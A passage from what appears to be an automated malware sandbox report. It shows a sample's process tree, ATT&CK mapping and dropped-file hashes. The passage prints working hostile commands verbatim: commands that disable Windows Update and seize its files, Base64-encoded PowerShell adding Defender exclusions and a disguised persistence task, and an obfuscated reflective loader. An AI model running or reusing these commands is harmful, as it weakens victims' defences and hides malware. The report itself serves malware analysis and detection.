"\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1656

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:96

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3916

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:772

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:3988

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1268

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:4236

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4436

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2280

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:4584

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4324

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3944

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3616

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4232

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3584

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3904

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:3524

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:4472

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:4940

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:420

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:4336

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:4796

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:2720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:2732

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:1240

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:2468

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:5112

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:2212

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "epzggvhm"
4⤵
PID:164

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J
4⤵
- Executes dropped EXE
PID:3416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1372

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1532

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2452

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2800

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2056

C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe
"C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1972

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4388

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:4516

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:4424

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:4620

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:4932

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:4252

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:3840

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:4676

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:4308

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4064

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1424

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1420

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1232

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2284

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:3160

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3320

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:3416

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:5040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
4⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsDefender"
5⤵
PID:1412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:1240

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3668

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3668 -s 856
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4392

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4276

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4276 -s 788
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4756

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE842.tmp.csv
Filesize
31KB

MD5
0dd53c799bc089baa0d31671b64584d9

SHA1
50ad7da905cc7a5a5114b64713de95cc3df051bc

SHA256
